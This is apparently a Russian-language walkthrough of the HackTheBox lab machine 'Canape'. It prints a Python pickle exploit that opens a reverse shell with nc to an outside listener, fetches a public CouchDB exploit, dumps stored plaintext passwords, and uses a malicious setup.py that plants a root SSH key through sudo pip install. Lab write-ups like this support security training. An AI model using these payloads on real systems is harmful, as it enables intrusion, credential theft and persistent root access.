HackTheBox Canape

Обзор сервисов

$ sudo nmap -sC -sV -sT -Pn -p- -v -oN nmap 10.10.10.70

PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 3FED5FB44C411733402A1C8C01E49994
| http-git:
|   10.10.10.70:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|     Last commit message: final # Please enter the commit message for your changes. Li...
|     Remotes:
|_      http://git.canape.htb/simpsons.git
| http-methods:
|_  Supported Methods: HEAD OPTIONS GET
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Simpsons Fan Site
|_http-trane-info: Problem with XML parsing of /evox/about
65535/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 8d:82:0b:31:90:e4:c8:85:b2:53:8b:a1:7c:3b:65:e1 (RSA)
|   256 22:fc:6e:c3:55:00:85:0f:24:bf:f5:79:6c:92:8b:68 (ECDSA)
|_  256 0d:91:27:51:80:5e:2b:a3:81:0d:e9:d8:5c:9b:77:35 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

http://10.10.10.70/.git/config

[core]
 repositoryformatversion = 0
 filemode = true
 bare = false
 logallrefupdates = true
[remote "origin"]
 url = http://git.canape.htb/simpsons.git
 fetch = +refs/heads/*:refs/remotes/origin/*
[branch "master"]
 remote = origin
 merge = refs/heads/master

Добавим 10.10.10.70 git.canape.htb canape.htb в /etc/hosts.

Git

$ git clone http://git.canape.htb/simpsons.git
$ cd simpsons
$ cat __init__.py
...

db = couchdb.Server("http://localhost:5984/")[app.config["DATABASE"]]

Exploit

Кастомный CPickle exploit.py

import requests
import hashlib
import cPickle
import os

class Test(object):
  def __reduce__(self):
    return (os.system,("homer!;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.6 1234 >/tmp/f",))

character, quote = cPickle.dumps(Test()).split("!")
p_id = hashlib.md5(character + quote).hexdigest()

requests.post("http://10.10.10.70/submit", data={"character": character, "quote": quote})
requests.post("http://10.10.10.70/check", data={"id": p_id})

nc -lnvp 1234
python exp.py

CouchDB

Couchdb запущен от имени пользователя homer:

Alt text

Публичный эксплоит

wget https://raw.githubusercontent.com/vulhub/vulhub/master/couchdb/CVE-2017-12636/exp.py

Загрузим его в /tmp/exp.py и модифицируем IP-адрес. Запускаем:

python3 exp.py

wooyun:wooyun - этот пользователь будет иметь админские права в CouchDB после выполнения скрипта.

www-data@canape:/tmp$ curl 127.0.0.1:5984/passwords/_all_docs --user 'wooyun:wooyun'
{"total_rows":4,"offset":0,"rows":[
{"id":"739c5ebdf3f7a001bebb8fc4380019e4","key":"739c5ebdf3f7a001bebb8fc4380019e4","value":{"rev":"2-81cf17b971d9229c54be92eeee723296"}},
{"id":"739c5ebdf3f7a001bebb8fc43800368d","key":"739c5ebdf3f7a001bebb8fc43800368d","value":{"rev":"2-43f8db6aa3b51643c9a0e21cacd92c6e"}},
{"id":"739c5ebdf3f7a001bebb8fc438003e5f","key":"739c5ebdf3f7a001bebb8fc438003e5f","value":{"rev":"1-77cd0af093b96943ecb42c2e5358fe61"}},
{"id":"739c5ebdf3f7a001bebb8fc438004738","key":"739c5ebdf3f7a001bebb8fc438004738","value":{"rev":"1-49a20010e64044ee7571b8c1b902cf8c"}}
]}
www-data@canape:/tmp$ curl 127.0.0.1:5984/passwords/739c5ebdf3f7a001bebb8fc4380019e4 --user 'wooyun:wooyun'
{"_id":"739c5ebdf3f7a001bebb8fc4380019e4","_rev":"2-81cf17b971d9229c54be92eeee723296","item":"ssh","password":"0B4jyA0xtytZi7esBNGp","user":""}
www-data@canape:/tmp$ curl 127.0.0.1:5984/passwords/739c5ebdf3f7a001bebb8fc43800368d --user 'wooyun:wooyun'
{"_id":"739c5ebdf3f7a001bebb8fc43800368d","_rev":"2-43f8db6aa3b51643c9a0e21cacd92c6e","item":"couchdb","password":"r3lax0Nth3C0UCH","user":"couchy"}
www-data@canape:/tmp$ curl 127.0.0.1:5984/passwords/739c5ebdf3f7a001bebb8fc438003e5f --user 'wooyun:wooyun'
{"_id":"739c5ebdf3f7a001bebb8fc438003e5f","_rev":"1-77cd0af093b96943ecb42c2e5358fe61","item":"simpsonsfanclub.com","password":"h02ddjdj2k2k2","user":"homer"}
www-data@canape:/tmp$ curl 127.0.0.1:5984/passwords/739c5ebdf3f7a001bebb8fc438004738 --user 'wooyun:wooyun'
{"_id":"739c5ebdf3f7a001bebb8fc438004738","_rev":"1-49a20010e64044ee7571b8c1b902cf8c","user":"homerj0121","item":"github","password":"STOP STORING YOUR PASSWORDS HERE -Admin"}

Alt text

Флаг пользователя

$ ssh [email protected] -p 65535
0B4jyA0xtytZi7esBNGp

Alt text

homer@canape:~$ cat user.txt
bce918696f293e62b2321703bb27288d

Повышение привилегий

homer@canape:~$ sudo -l
[sudo] password for homer:
Matching Defaults entries for homer on canape:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User homer may run the following commands on canape:
    (root) /usr/bin/pip install *

mkdir /tmp/t
cd /tmp/t
nano setup.py

from setuptools import setup
from setuptools.command.install import install
import base64
import os


class CustomInstall(install):
  def run(self):
    install.run(self)

    reverse_shell = 'mkdir /root/.ssh;echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCtRShyvgwXRSQCdJxVHSOmsvH1gbQMXAuUYSs0abix0cynMoPGfWCO9GE9nF6gSvcrvcu5L6aLnOFkot147K8uys3BCGRyeUpkdf+3ulecAHJCvMRymEr0dUzxu+1KTINPrxNtDOf7sLRPIr0pKql7Roi4LQ4SuFuB2Rm+LUaQvjSYbogt+gtEYEOHlfetJC/4XthYcmFi4jQdA9DEva07LIlmIsr/CmtLFZ40/zSKcv88OFXAUW86+82KOR/LcV65TDQ4uXyF72d6R5pmXods7EP3WqdFxsIHq0rGPJPitSSIGzWsYF0k5NdN4i+990OBUi3dHaFHy9F6TVLPR7tQMj6zaSBp4gPnCCsFebLnfuv3tN4gOL7CS21bJS7HYaTa3ApGN+onUyCn7NK0JXpNpm9YUu43IVwNRA6Z6E20hVfbxhEYQLB1PhhfF6DPQ/b4NI8fch1zGV3uL0qK8XL7K8zKsYOgWTffmH2s/kh724HuI2jUxBiJ3RH171cRxnU= kali@kalihackthebox >> /root/.ssh/authorized_keys'
    encoded = base64.b64encode(reverse_shell)
    os.system('echo %s|base64 -d|bash' % encoded)


setup(name='FakePip',
      version='0.0.1',
      description='This will exploit a sudoer able to /usr/bin/pip install *',
      url='https://github.com/0x00-0x00/fakepip',
      author='zc00l',
      author_email='[email protected]',
      license='MIT',
      zip_safe=False,
      cmdclass={'install': CustomInstall})

sudo -H /usr/bin/pip install . --upgrade --force-reinstall

Флаг суперпользователя

$ ssh [email protected] -p 65535
root@canape:~# ls
root.txt
root@canape:~# ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:b9:80:86 brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.70/24 brd 10.10.10.255 scope global ens33
       valid_lft forever preferred_lft forever
root@canape:~# id
uid=0(root) gid=0(root) groups=0(root)
root@canape:~# cat root.txt
928c3df1a12d7f67d2e8c2937120976d

Alt text

Обзор сервисов #

Git #

Exploit #

CouchDB #

Публичный эксплоит #

Флаг пользователя #

Повышение привилегий #

Флаг суперпользователя #

Обзор сервисов

Git

Exploit

CouchDB

Публичный эксплоит

Флаг пользователя

Повышение привилегий

Флаг суперпользователя